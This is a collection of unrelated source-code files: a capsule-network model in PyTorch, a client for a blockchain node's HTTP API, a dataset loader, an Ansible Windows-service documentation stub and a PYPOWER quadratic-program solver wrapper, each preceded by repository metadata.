self.capsule_layers.append( layers.SACapsuleCONV(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['capsules'][i]['num_caps'], out_d_capsules=params['capsules'][i]['caps_dim'], kernel_size=params['capsules'][i]['kernel_size'], stride=params['capsules'][i]['stride'], matrix_pose=params['capsules'][i]['matrix_pose'], dp=dp, coordinate_add=False, padding=params['capsules'][i].get('padding', None) ) ) elif params['capsules'][i]['type'] == 'FC': if i == 0: in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\ params['primary_capsules']['out_img_size'] in_d_caps = params['primary_capsules']['caps_dim'] elif params['capsules'][i-1]['type'] == 'FC': in_n_caps = params['capsules'][i-1]['num_caps'] in_d_caps = params['capsules'][i-1]['caps_dim'] elif params['capsules'][i-1]['type'] == 'CONV': in_n_caps = params['capsules'][i-1]['num_caps'] * params['capsules'][i-1]['out_img_size'] *\ params['capsules'][i-1]['out_img_size'] in_d_caps = params['capsules'][i-1]['caps_dim'] self.capsule_layers.append( layers.SACapsuleFC(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['capsules'][i]['num_caps'], out_d_capsules=params['capsules'][i]['caps_dim'], matrix_pose=params['capsules'][i]['matrix_pose'], dp=dp ) ) ## Class Capsule Layer if not len(params['capsules'])==0: if params['capsules'][-1]['type'] == 'FC': in_n_caps = params['capsules'][-1]['num_caps'] in_d_caps = params['capsules'][-1]['caps_dim'] elif params['capsules'][-1]['type'] == 'CONV': in_n_caps = params['capsules'][-1]['num_caps'] * params['capsules'][-1]['out_img_size'] *\ params['capsules'][-1]['out_img_size'] in_d_caps = params['capsules'][-1]['caps_dim'] else: in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\ params['primary_capsules']['out_img_size'] in_d_caps = params['primary_capsules']['caps_dim'] self.capsule_layers.append( layers.SACapsuleFC(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['class_capsules']['num_caps'], out_d_capsules=params['class_capsules']['caps_dim'], matrix_pose=params['class_capsules']['matrix_pose'], dp=dp ) ) ## After Capsule # fixed classifier for all class capsules self.final_fc = nn.Linear(params['class_capsules']['caps_dim'], 1) # different classifier for different capsules #self.final_fc = nn.Parameter(torch.randn(params['class_capsules']['num_caps'], params['class_capsules']['caps_dim'])) def forward(self, x, lbl_1=None, lbl_2=None): #### Forward Pass ## Backbone (before capsule) c = self.pre_caps(x) # print(c.shape) # print("Backbone: ", c.shape) ## Primary Capsule Layer (a single CNN) u = self.pc_layer(c) # torch.Size([100, 512, 14, 14]) u = u.permute(0, 2, 3, 1) # 100, 14, 14, 512 # print("Shape:", u.shape) u = u.view(u.shape[0], self.pc_output_dim, self.pc_output_dim, self.pc_num_caps, self.pc_caps_dim) # 100, 14, 14, 32, 16 u = u.permute(0, 3, 1, 2, 4) # 100, 32, 14, 14, 16 init_capsule_value = self.nonlinear_act(u)#capsule_utils.squash(u) ## Main Capsule Layers # concurrent routing if not self.sequential_routing: # first iteration # perform initilialization for the capsule values as single forward passing capsule_values, _val = [init_capsule_value], init_capsule_value for i in range(len(self.capsule_layers)): _val = self.capsule_layers[i].forward(_val, 0) capsule_values.append(_val) # get the capsule value for next layer # second to t iterations # perform the routing between capsule layers for n in range(self.num_routing-1): _capsule_values = 
[init_capsule_value] for i in range(len(self.capsule_layers)): _val = self.capsule_layers[i].forward(capsule_values[i], n, capsule_values[i+1]) _capsule_values.append(_val) capsule_values = _capsule_values # sequential routing else: capsule_values, _val = [init_capsule_value], init_capsule_value for i in range(len(self.capsule_layers)): # first iteration __val = self.capsule_layers[i].forward(_val, 0) # second to t iterations # perform the routing between capsule layers for n in range(self.num_routing-1): __val = self.capsule_layers[i].forward(_val, n, __val) _val = __val capsule_values.append(_val) ## After Capsule out = capsule_values[-1] # print("out shape, ", out.shape) out = self.final_fc(out) # fixed classifier for all capsules # print("classifier shape, ", out.shape) out = out.squeeze(1) # fixed classifier for all capsules out = out.squeeze(2) out = out.squeeze(1) #out = torch.einsum('bnd, nd->bn', out, self.final_fc) # different classifiers for distinct capsules # print("Final shape, ", out.shape) return out # Capsule model with bilinear routing without sinkhorn class CapsBAModel(nn.Module): def __init__(self, image_dim_size, params, dataset, backbone, dp, num_routing, sequential_routing=True): super(CapsBAModel, self).__init__() #### Parameters self.sequential_routing = sequential_routing ## Primary Capsule Layer self.pc_num_caps = params['primary_capsules']['num_caps'] self.pc_caps_dim = params['primary_capsules']['caps_dim'] self.pc_output_dim = params['primary_capsules']['out_img_size'] ## General self.num_routing = num_routing # >3 may cause slow converging #### Building Networks ## Backbone (before capsule) if backbone == 'simple': self.pre_caps = layers.simple_backbone(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['kernel_size'], params['backbone']['stride'], params['backbone']['padding']) elif backbone == 'resnet': # Ouputs 16 X 16 X 128 dim if dataset == 'CIFAR10' or dataset == 'CIFAR100'or "NIST" in dataset: print("Using CIFAR backbone") self.pre_caps = layers.resnet_backbone_cifar(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['stride']) else: print("Using New ResNet Backbone") self.pre_caps = layers.resnet_backbone_imagenet(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['stride']) ## Primary Capsule Layer (a single CNN) self.pc_layer = nn.Conv2d(in_channels=params['primary_capsules']['input_dim'], out_channels=params['primary_capsules']['num_caps'] *\ params['primary_capsules']['caps_dim'], kernel_size=params['primary_capsules']['kernel_size'], stride=params['primary_capsules']['stride'], padding=params['primary_capsules']['padding'], bias=False) #self.pc_layer = nn.Sequential() self.nonlinear_act = nn.LayerNorm(params['primary_capsules']['caps_dim']) ## Main Capsule Layers self.capsule_layers = nn.ModuleList([]) for i in range(len(params['capsules'])): if params['capsules'][i]['type'] == 'CONV': in_n_caps = params['primary_capsules']['num_caps'] if i==0 else \ params['capsules'][i-1]['num_caps'] in_d_caps = params['primary_capsules']['caps_dim'] if i==0 else \ params['capsules'][i-1]['caps_dim'] self.capsule_layers.append( layers.BACapsuleCONV(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['capsules'][i]['num_caps'], out_d_capsules=params['capsules'][i]['caps_dim'], kernel_size=params['capsules'][i]['kernel_size'], stride=params['capsules'][i]['stride'], matrix_pose=params['capsules'][i]['matrix_pose'], dp=dp, 
coordinate_add=False, padding=params['capsules'][i].get('padding', None) ) ) elif params['capsules'][i]['type'] == 'FC': if i == 0: in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\ params['primary_capsules']['out_img_size'] in_d_caps = params['primary_capsules']['caps_dim'] elif params['capsules'][i-1]['type'] == 'FC': in_n_caps = params['capsules'][i-1]['num_caps'] in_d_caps = params['capsules'][i-1]['caps_dim'] elif params['capsules'][i-1]['type'] == 'CONV': in_n_caps = params['capsules'][i-1]['num_caps'] * params['capsules'][i-1]['out_img_size'] *\ params['capsules'][i-1]['out_img_size'] in_d_caps = params['capsules'][i-1]['caps_dim'] self.capsule_layers.append( layers.BACapsuleFC(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['capsules'][i]['num_caps'], out_d_capsules=params['capsules'][i]['caps_dim'], matrix_pose=params['capsules'][i]['matrix_pose'], dp=dp ) ) ## Class Capsule Layer if not len(params['capsules'])==0: if params['capsules'][-1]['type'] == 'FC': in_n_caps = params['capsules'][-1]['num_caps'] in_d_caps = params['capsules'][-1]['caps_dim'] elif params['capsules'][-1]['type'] == 'CONV': in_n_caps = params['capsules'][-1]['num_caps'] * params['capsules'][-1]['out_img_size'] *\ params['capsules'][-1]['out_img_size'] in_d_caps = params['capsules'][-1]['caps_dim'] else: in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\ params['primary_capsules']['out_img_size'] in_d_caps = params['primary_capsules']['caps_dim'] self.capsule_layers.append( layers.BACapsuleFC(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['class_capsules']['num_caps'], out_d_capsules=params['class_capsules']['caps_dim'], matrix_pose=params['class_capsules']['matrix_pose'], dp=dp ) ) ## After Capsule # fixed classifier for all class capsules self.final_fc = nn.Linear(params['class_capsules']['caps_dim'], 1) # different classifier for different capsules #self.final_fc = nn.Parameter(torch.randn(params['class_capsules']['num_caps'], params['class_capsules']['caps_dim'])) def forward(self, x, lbl_1=None, lbl_2=None): #### Forward Pass ## Backbone (before capsule) c = self.pre_caps(x) # print(c.shape) # print("Backbone: ", c.shape) ## Primary Capsule Layer (a single CNN) u = self.pc_layer(c) # torch.Size([100, 512, 14, 14]) u = u.permute(0, 2, 3, 1) # 100, 14, 14, 512 # print("Shape:", u.shape) u = u.view(u.shape[0], self.pc_output_dim, self.pc_output_dim, self.pc_num_caps, self.pc_caps_dim) # 100, 14, 14, 32, 16 u = u.permute(0, 3, 1, 2, 4) # 100, 32, 14, 14, 16 init_capsule_value = self.nonlinear_act(u)#capsule_utils.squash(u) ## Main Capsule Layers # concurrent routing if not self.sequential_routing: # first iteration # perform initilialization for the capsule values as single forward passing capsule_values, _val = [init_capsule_value], init_capsule_value for i in range(len(self.capsule_layers)): _val = self.capsule_layers[i].forward(_val, 0) capsule_values.append(_val) # get the capsule value for next layer # second to t iterations # perform the routing between capsule layers for n in range(self.num_routing-1): _capsule_values = [init_capsule_value] for i in range(len(self.capsule_layers)): _val = self.capsule_layers[i].forward(capsule_values[i], n, capsule_values[i+1]) _capsule_values.append(_val) capsule_values = _capsule_values # sequential routing else: capsule_values, _val = [init_capsule_value], init_capsule_value for i in range(len(self.capsule_layers)): # 
first iteration __val = self.capsule_layers[i].forward(_val, 0) # second to t iterations # perform the routing between capsule layers for n in range(self.num_routing-1): __val = self.capsule_layers[i].forward(_val, n, __val) _val = __val capsule_values.append(_val) ## After Capsule out = capsule_values[-1] # print("out shape, ", out.shape) out = self.final_fc(out) # fixed classifier for all capsules # print("classifier shape, ", out.shape) out = out.squeeze(1) # fixed classifier for all capsules out = out.squeeze(2) out = out.squeeze(1) #out = torch.einsum('bnd, nd->bn', out, self.final_fc) # different classifiers for distinct capsules # print("Final shape, ", out.shape) return out # Capsule model with bilinear routing with dynamic routing class CapsDBAModel(nn.Module): def __init__(self, image_dim_size, params, dataset, backbone, dp, num_routing, sequential_routing=True): super(CapsDBAModel, self).__init__() #### Parameters self.sequential_routing = sequential_routing ## Primary Capsule Layer self.pc_num_caps = params['primary_capsules']['num_caps'] self.pc_caps_dim = params['primary_capsules']['caps_dim'] self.pc_output_dim = params['primary_capsules']['out_img_size'] ## General self.num_routing = num_routing # >3 may cause slow converging #### Building Networks ## Backbone (before capsule) if backbone == 'simple': self.pre_caps = layers.simple_backbone(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['kernel_size'], params['backbone']['stride'], params['backbone']['padding']) elif backbone == 'resnet': # Ouputs 16 X 16 X 128 dim if dataset == 'CIFAR10' or dataset == 'CIFAR100'or "NIST" in dataset: print("Using CIFAR backbone") self.pre_caps = layers.resnet_backbone_cifar(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['stride']) else: print("Using New ResNet Backbone") self.pre_caps = layers.resnet_backbone_imagenet(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['stride']) ## Primary Capsule Layer (a single CNN) self.pc_layer = nn.Conv2d(in_channels=params['primary_capsules']['input_dim'], out_channels=params['primary_capsules']['num_caps'] *\ params['primary_capsules']['caps_dim'], kernel_size=params['primary_capsules']['kernel_size'], stride=params['primary_capsules']['stride'], padding=params['primary_capsules']['padding'], bias=False) #self.pc_layer = nn.Sequential() self.nonlinear_act = nn.LayerNorm(params['primary_capsules']['caps_dim']) ## Main Capsule Layers self.capsule_layers = nn.ModuleList([]) for i in range(len(params['capsules'])): if params['capsules'][i]['type'] == 'CONV': in_n_caps = params['primary_capsules']['num_caps'] if i==0 else \ params['capsules'][i-1]['num_caps'] in_d_caps = params['primary_capsules']['caps_dim'] if i==0 else \ params['capsules'][i-1]['caps_dim'] self.capsule_layers.append( layers.DBACapsuleCONV(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['capsules'][i]['num_caps'], out_d_capsules=params['capsules'][i]['caps_dim'], kernel_size=params['capsules'][i]['kernel_size'], stride=params['capsules'][i]['stride'], matrix_pose=params['capsules'][i]['matrix_pose'], dp=dp, coordinate_add=False, padding=params['capsules'][i].get('padding', None) ) ) elif params['capsules'][i]['type'] == 'FC': if i == 0: in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\ params['primary_capsules']['out_img_size'] in_d_caps = params['primary_capsules']['caps_dim'] elif 
params['capsules'][i-1]['type'] == 'FC': in_n_caps = params['capsules'][i-1]['num_caps'] in_d_caps = params['capsules'][i-1]['caps_dim'] elif params['capsules'][i-1]['type'] == 'CONV': in_n_caps = params['capsules'][i-1]['num_caps'] * params['capsules'][i-1]['out_img_size'] *\ params['capsules'][i-1]['out_img_size'] in_d_caps = params['capsules'][i-1]['caps_dim'] self.capsule_layers.append( layers.DBACapsuleFC(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['capsules'][i]['num_caps'], out_d_capsules=params['capsules'][i]['caps_dim'], matrix_pose=params['capsules'][i]['matrix_pose'], dp=dp ) ) ## Class Capsule Layer if not len(params['capsules'])==0: if params['capsules'][-1]['type'] == 'FC': in_n_caps = params['capsules'][-1]['num_caps'] in_d_caps = params['capsules'][-1]['caps_dim'] elif params['capsules'][-1]['type'] == 'CONV': in_n_caps = params['capsules'][-1]['num_caps'] * params['capsules'][-1]['out_img_size'] *\ params['capsules'][-1]['out_img_size'] in_d_caps = params['capsules'][-1]['caps_dim'] else: in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\ params['primary_capsules']['out_img_size'] in_d_caps = params['primary_capsules']['caps_dim'] self.capsule_layers.append( layers.DBACapsuleFC(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['class_capsules']['num_caps'], out_d_capsules=params['class_capsules']['caps_dim'], matrix_pose=params['class_capsules']['matrix_pose'], dp=dp ) ) ## After Capsule # fixed classifier for all class capsules self.final_fc = nn.Linear(params['class_capsules']['caps_dim'], 1) # different classifier for different capsules #self.final_fc = nn.Parameter(torch.randn(params['class_capsules']['num_caps'], params['class_capsules']['caps_dim'])) def forward(self, x, lbl_1=None, lbl_2=None): #### Forward Pass ## Backbone (before capsule) c = self.pre_caps(x) # print(c.shape) # print("Backbone: ", c.shape) ## Primary Capsule Layer (a single CNN) u = self.pc_layer(c) # torch.Size([100, 512, 14, 14]) u = u.permute(0, 2, 3, 1) # 100, 14, 14, 512 # print("Shape:", u.shape) u = u.view(u.shape[0], self.pc_output_dim, self.pc_output_dim, self.pc_num_caps, self.pc_caps_dim) # 100, 14, 14, 32, 16 u = u.permute(0, 3, 1, 2, 4) # 100, 32, 14, 14, 16 # init_capsule_value = self.nonlinear_act(u)#capsule_utils.squash(u) init_capsule_value = u ## Main Capsule Layers # Sequetial routing only if self.sequential_routing: capsule_values, _val = [init_capsule_value], init_capsule_value for i in range(len(self.capsule_layers)): routing_coeff = None for n in range(self.num_routing): # print("Routing num ", n) new_coeff, __val = self.capsule_layers[i].forward(_val, n, routing_coeff) routing_coeff = new_coeff _val = __val capsule_values.append(_val) ## After Capsule out = capsule_values[-1] # print("out shape, ", out.shape) out = self.final_fc(out) # fixed classifier for all capsules # print("classifier shape, ", out.shape) out = out.squeeze(1) # fixed classifier for all capsules out = out.squeeze(2) out = out.squeeze(1) #out = torch.einsum('bnd, nd->bn', out, self.final_fc) # different classifiers for distinct capsules # print("Final shape, ", out.shape) return out
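# --- Hypothetical usage sketch (not part of the original file) ---
# Builds CapsModel from a params dict shaped like the one quoted in the module
# comment near the top; dataset/backbone/routing values are illustrative only.
#
# params = {
#     'backbone': {'kernel_size': 3, 'output_dim': 128, 'input_dim': 3,
#                  'stride': 2, 'padding': 1, 'out_img_size': 16},
#     'primary_capsules': {'kernel_size': 1, 'stride': 1, 'input_dim': 128,
#                          'caps_dim': 16, 'num_caps': 32, 'padding': 0,
#                          'out_img_size': 16},
#     'capsules': [{'type': 'CONV', 'num_caps': 32, 'caps_dim': 16,
#                   'kernel_size': 3, 'stride': 2, 'matrix_pose': True,
#                   'out_img_size': 7}],
#     'class_capsules': {'num_caps': 10, 'caps_dim': 16, 'matrix_pose': True},
# }
# model = CapsModel(image_dim_size=32, params=params, dataset='CIFAR10',
#                   backbone='resnet', dp=0.0, num_routing=2)
# out = model(torch.randn(2, 3, 32, 32))   # -> logits of shape (2, 10)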
1.726563
2
thenewboston_node/core/clients/node.py
fonar/thenewboston-node
0
12749867
import json import logging from typing import Generator, Optional, Type, TypeVar from urllib.parse import urlencode, urljoin from urllib.request import urlopen import requests from thenewboston_node.business_logic.blockchain.base import BlockchainBase from thenewboston_node.business_logic.blockchain.file_blockchain.sources import URLBlockSource from thenewboston_node.business_logic.models import Block, BlockchainState from thenewboston_node.business_logic.utils.blockchain_state import read_blockchain_state_file_from_source from thenewboston_node.core.utils.types import hexstr logger = logging.getLogger(__name__) T = TypeVar('T', bound='NodeClient') def setdefault_if_not_none(dict_, key, value): if value is not None: dict_.setdefault(key, value) def requests_get(url): # We need this function to mock it easier for unittests return requests.get(url) class NodeClient: _instance = None @classmethod def get_instance(cls: Type[T]) -> T: instance = cls._instance if not instance: cls._instance = instance = cls() return instance @staticmethod def http_get(network_address, resource, *, parameters=None, should_raise=True): # We do not use reverse() because client must be framework agnostic url = urljoin(network_address, f'/api/v1/{resource}/') if parameters: url += '?' + urlencode(parameters) try: response = requests_get(url) except Exception: logger.warning('Could not GET %s', url, exc_info=True) if should_raise: raise else: return None if should_raise: response.raise_for_status() else: status_code = response.status_code if status_code != requests.codes.ok: logger.warning('Could not GET %s: HTTP%s: %s', url, status_code, response.text) return None try: data = response.json() except json.decoder.JSONDecodeError: if should_raise: raise else: logger.warning('Non-JSON response GET %s: %s', url, response.text, exc_info=True) return None return data def list_resource( self, network_address, resource, *, offset=None, limit=None, ordering=None, parameters=None, should_raise=True ): parameters = parameters or {} setdefault_if_not_none(parameters, 'offset', offset) setdefault_if_not_none(parameters, 'limit', limit) setdefault_if_not_none(parameters, 'ordering', ordering) return self.http_get(network_address, resource, parameters=parameters, should_raise=should_raise) def get_latest_blockchain_state_meta_by_network_address(self, network_address) -> Optional[dict]: data = self.list_resource( network_address, 'blockchain-states-meta', limit=1, ordering='-last_block_number', should_raise=False ) if not data: return None results = data['results'] if not results: return None return results[0] def get_latest_blockchain_state_binary_by_network_address(self, network_address) -> Optional[tuple[bytes, str]]: meta = self.get_latest_blockchain_state_meta_by_network_address(network_address) if meta is None: return None for url in meta['urls']: logger.debug('Trying to get blockchain state binary from %s', url) try: with urlopen(url) as fo: return fo.read(), url except IOError: logger.warning('Unable to read blockchain state from %s', url, exc_info=True) continue return None def get_latest_blockchain_state_by_network_address(self, network_address) -> Optional[BlockchainState]: meta = self.get_latest_blockchain_state_meta_by_network_address(network_address) if meta is None: return None for url in meta['urls']: try: return read_blockchain_state_file_from_source(url) except IOError: logger.warning('Unable to read blockchain state from %s', url, exc_info=True) continue logger.warning('Could not read latest blockchain state from 
node: %s', network_address) return None def get_latest_blockchain_state_meta_by_network_addresses(self, network_addresses) -> Optional[dict]: for network_address in network_addresses: # TODO(dmu) CRITICAL: Try another network_address only if this one is unavailable return self.get_latest_blockchain_state_meta_by_network_address(network_address) return None def list_block_chunks_meta_by_network_address( self, network_address, from_block_number=None, to_block_number=None, offset=None, limit=None, direction=1 ): assert direction in (1, -1) parameters = {} setdefault_if_not_none(parameters, 'from_block_number', from_block_number) setdefault_if_not_none(parameters, 'to_block_number', to_block_number) data = self.list_resource( network_address, 'block-chunks-meta', offset=offset, limit=limit, ordering='start_block_number' if direction == 1 else '-start_block_number', parameters=parameters, should_raise=False ) return None if data is None else data['results'] def get_latest_block_chunk_meta_by_network_address(self, network_address) -> Optional[dict]: results = self.list_block_chunks_meta_by_network_address(network_address, limit=1, direction=-1) return results[0] if results else None def get_last_block_number_by_network_address(self, network_address): block_chunk_meta = self.get_latest_block_chunk_meta_by_network_address(network_address) if block_chunk_meta: return block_chunk_meta['end_block_number'] return None def get_latest_blockchain_state_meta_by_node_identifier(self, blockchain: BlockchainBase, node_identifier: hexstr) -> Optional[dict]: node = blockchain.get_node_by_identifier(node_identifier) if node is None: return None network_addresses = node.network_addresses if not network_addresses: return None return self.get_latest_blockchain_state_meta_by_network_addresses(network_addresses) def yield_blocks_slice(self, network_address, from_block_number: int, to_block_number: int) -> Generator[Block, None, None]: # TODO(dmu) MEDIUM: Consider improvements for network failovers # by the moment of downloading the last (incomplete) block chunk its name may change # (because of becoming complete) therefore we retry last_block_number = None for _ in range(2): block_chunks = self.list_block_chunks_meta_by_network_address( network_address, from_block_number=from_block_number, to_block_number=to_block_number ) for block_chunk in block_chunks: # TODO(dmu) HIGH: Support download from more than one URL url = block_chunk['urls'][0] source = URLBlockSource(url) try: source.force_read() except Exception: logger.warning('Error trying to download %s', url) break for block in URLBlockSource(url): block_number = block.get_block_number() if from_block_number is not None and block_number < from_block_number: # TODO(dmu) LOW: This can be optimized by applying the codition only to first block chunk # (be careful first block chunk may be also the last) # skip not requested block continue if last_block_number is not None and block_number <= last_block_number: # TODO(dmu) LOW: This maybe excessive precaution # We have seen this block already continue if to_block_number is not None and to_block_number < block_number: return yield block last_block_number = block_number if last_block_number is None: continue assert to_block_number is None or last_block_number <= to_block_number if to_block_number is not None and last_block_number >= to_block_number: # defensive programming break from_block_number = last_block_number + 1
1.820313
2
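A minimal usage sketch for the NodeClient record above. The module name (node_client) and the node address are placeholders assumed for illustration; the class, its method names, and the 'urls' key come from the record itself.

from node_client import NodeClient  # assumed module name for the file above

client = NodeClient.get_instance()                      # singleton accessor defined in the class
address = "http://127.0.0.1:8555/"                      # placeholder node address
meta = client.get_latest_blockchain_state_meta_by_network_address(address)
if meta is None:
    print("node unreachable or no blockchain states listed")
else:
    print("blockchain state file URLs:", meta["urls"])  # same key the class reads internally
print("last block number:", client.get_last_block_number_by_network_address(address))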
datasetsnx/dataset.py
ckxy/part-of-hitogata
0
12749995
<gh_stars>0 import torch.utils.data as data from .bamboo import Bamboo from .readers import * class Dataset(data.Dataset): def __init__(self, cfg, **kwargs): self.cfg = cfg self.use_pil = cfg.use_pil if cfg.use_pil else True k, v = cfg.reader self.reader = eval(k)(**v) if cfg.internodes: self.bamboo = Bamboo(cfg.internodes) else: self.bamboo = Bamboo([]) self.data_lines, self.info = self.reader.get_dataset_info() self.get_data_info_fn = self.reader.get_data_info if 0 < self.cfg.max_size < len(self.data_lines): self.data_lines = self.data_lines[:self.cfg.max_size] def __getitem__(self, index): data_dict = dict(reader=self.reader, index=index, len_data_lines=len(self)) data_dict = self.bamboo(data_dict) # data_dict.pop('len_data_lines') return data_dict def get_data_info(self, index): return self.get_data_info_fn(index) def __len__(self): return len(self.data_lines) def __repr__(self): split_str = self.bamboo.__repr__().split('\n') bamboo_str = split_str[0] for i in range(1, len(split_str)): bamboo_str += '\n ' + split_str[i] return 'Dataset(\n len: {}\n reader: {}\n bamboo: {} \n)'.format(len(self), self.reader.__repr__(), bamboo_str)
1.9375
2
applied_python/applied_python/lib/python2.7/site-packages/ansible/modules/core/windows/win_service.py
mith1979/ansible_automation
1
12750123
<reponame>mith1979/ansible_automation<filename>applied_python/applied_python/lib/python2.7/site-packages/ansible/modules/core/windows/win_service.py #!/usr/bin/python # -*- coding: utf-8 -*- # (c) 2014, <NAME> <<EMAIL>> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # this is a windows documentation stub. actual code lives in the .ps1 # file of the same name DOCUMENTATION = ''' --- module: win_service version_added: "1.7" short_description: Manages Windows services description: - Manages Windows services options: name: description: - Name of the service required: true default: null aliases: [] start_mode: description: - Set the startup type for the service required: false choices: - auto - manual - disabled state: description: - C(started)/C(stopped) are idempotent actions that will not run commands unless necessary. C(restarted) will always bounce the service. required: false choices: - started - stopped - restarted default: null aliases: [] author: <NAME> ''' EXAMPLES = ''' # Restart a service win_service: name: spooler state: restarted # Set service startup mode to auto and ensure it is started win_service: name: spooler start_mode: auto state: started '''
1.304688
1
pandapower/pypower/qps_pypower.py
yougnen/pandapower
104
12750251
# Copyright (c) 1996-2015 PSERC. All rights reserved. # Use of this source code is governed by a BSD-style # license that can be found in the LICENSE file. """Quadratic Program Solver for PYPOWER. """ import sys from pandapower.pypower.qps_pips import qps_pips #from pandapower.pypower.qps_ipopt import qps_ipopt #from pandapower.pypower.qps_cplex import qps_cplex #from pandapower.pypower.qps_mosek import qps_mosek #from pandapower.pypower.qps_gurobi import qps_gurobi from pandapower.pypower.util import have_fcn def qps_pypower(H, c=None, A=None, l=None, u=None, xmin=None, xmax=None, x0=None, opt=None): """Quadratic Program Solver for PYPOWER. A common wrapper function for various QP solvers. Solves the following QP (quadratic programming) problem:: min 1/2 x'*H*x + c'*x x subject to:: l <= A*x <= u (linear constraints) xmin <= x <= xmax (variable bounds) Inputs (all optional except C{H}, C{c}, C{A} and C{l}): - C{H} : matrix (possibly sparse) of quadratic cost coefficients - C{c} : vector of linear cost coefficients - C{A, l, u} : define the optional linear constraints. Default values for the elements of C{l} and C{u} are -Inf and Inf, respectively. - C{xmin}, C{xmax} : optional lower and upper bounds on the C{x} variables, defaults are -Inf and Inf, respectively. - C{x0} : optional starting value of optimization vector C{x} - C{opt} : optional options structure with the following fields, all of which are also optional (default values shown in parentheses) - C{alg} (0) - determines which solver to use - 0 = automatic, first available of BPMPD_MEX, CPLEX, Gurobi, PIPS - 100 = BPMPD_MEX - 200 = PIPS, Python Interior Point Solver pure Python implementation of a primal-dual interior point method - 250 = PIPS-sc, a step controlled variant of PIPS - 300 = Optimization Toolbox, QUADPROG or LINPROG - 400 = IPOPT - 500 = CPLEX - 600 = MOSEK - 700 = Gurobi - C{verbose} (0) - controls level of progress output displayed - 0 = no progress output - 1 = some progress output - 2 = verbose progress output - C{max_it} (0) - maximum number of iterations allowed - 0 = use algorithm default - C{bp_opt} - options vector for BP - C{cplex_opt} - options dict for CPLEX - C{grb_opt} - options dict for gurobipy - C{ipopt_opt} - options dict for IPOPT - C{pips_opt} - options dict for L{qps_pips} - C{mosek_opt} - options dict for MOSEK - C{ot_opt} - options dict for QUADPROG/LINPROG - C{problem} : The inputs can alternatively be supplied in a single C{problem} dict with fields corresponding to the input arguments described above: C{H, c, A, l, u, xmin, xmax, x0, opt} Outputs: - C{x} : solution vector - C{f} : final objective function value - C{exitflag} : exit flag - 1 = converged - 0 or negative values = algorithm specific failure codes - C{output} : output struct with the following fields: - C{alg} - algorithm code of solver used - (others) - algorithm specific fields - C{lmbda} : dict containing the Langrange and Kuhn-Tucker multipliers on the constraints, with fields: - C{mu_l} - lower (left-hand) limit on linear constraints - C{mu_u} - upper (right-hand) limit on linear constraints - C{lower} - lower bound on optimization variables - C{upper} - upper bound on optimization variables Example from U{http://www.uc.edu/sashtml/iml/chap8/sect12.htm}: >>> from numpy import array, zeros, Inf >>> from scipy.sparse import csr_matrix >>> H = csr_matrix(array([[1003.1, 4.3, 6.3, 5.9], ... [4.3, 2.2, 2.1, 3.9], ... [6.3, 2.1, 3.5, 4.8], ... [5.9, 3.9, 4.8, 10 ]])) >>> c = zeros(4) >>> A = csr_matrix(array([[1, 1, 1, 1 ], ... 
[0.17, 0.11, 0.10, 0.18]])) >>> l = array([1, 0.10]) >>> u = array([1, Inf]) >>> xmin = zeros(4) >>> xmax = None >>> x0 = array([1, 0, 0, 1]) >>> solution = qps_pips(H, c, A, l, u, xmin, xmax, x0) >>> round(solution["f"], 11) == 1.09666678128 True >>> solution["converged"] True >>> solution["output"]["iterations"] 10 @author: <NAME> (PSERC Cornell) """ if opt is None: opt = {} # if x0 is None: # x0 = array([]) # if xmax is None: # xmax = array([]) # if xmin is None: # xmin = array([]) ## default options if 'alg' in opt: alg = opt['alg'] else: alg = 0 if 'verbose' in opt: verbose = opt['verbose'] else: verbose = 0 ##----- call the appropriate solver ----- # if alg == 0 or alg == 200 or alg == 250: ## use MIPS or sc-MIPS ## set up options if 'pips_opt' in opt: pips_opt = opt['pips_opt'] else: pips_opt = {} if 'max_it' in opt: pips_opt['max_it'] = opt['max_it'] if alg == 200: pips_opt['step_control'] = False else: pips_opt['step_control'] = True pips_opt['verbose'] = verbose ## call solver x, f, eflag, output, lmbda = \ qps_pips(H, c, A, l, u, xmin, xmax, x0, pips_opt) # elif alg == 400: ## use IPOPT # x, f, eflag, output, lmbda = \ # qps_ipopt(H, c, A, l, u, xmin, xmax, x0, opt) # elif alg == 500: ## use CPLEX # x, f, eflag, output, lmbda = \ # qps_cplex(H, c, A, l, u, xmin, xmax, x0, opt) # elif alg == 600: ## use MOSEK # x, f, eflag, output, lmbda = \ # qps_mosek(H, c, A, l, u, xmin, xmax, x0, opt) # elif 700: ## use Gurobi # x, f, eflag, output, lmbda = \ # qps_gurobi(H, c, A, l, u, xmin, xmax, x0, opt) # else: # print('qps_pypower: {} is not a valid algorithm code\n'.format(alg)) if 'alg' not in output: output['alg'] = alg return x, f, eflag, output, lmbda
2.1875
2
LeetCode/Meeting Rooms II - Heap.py
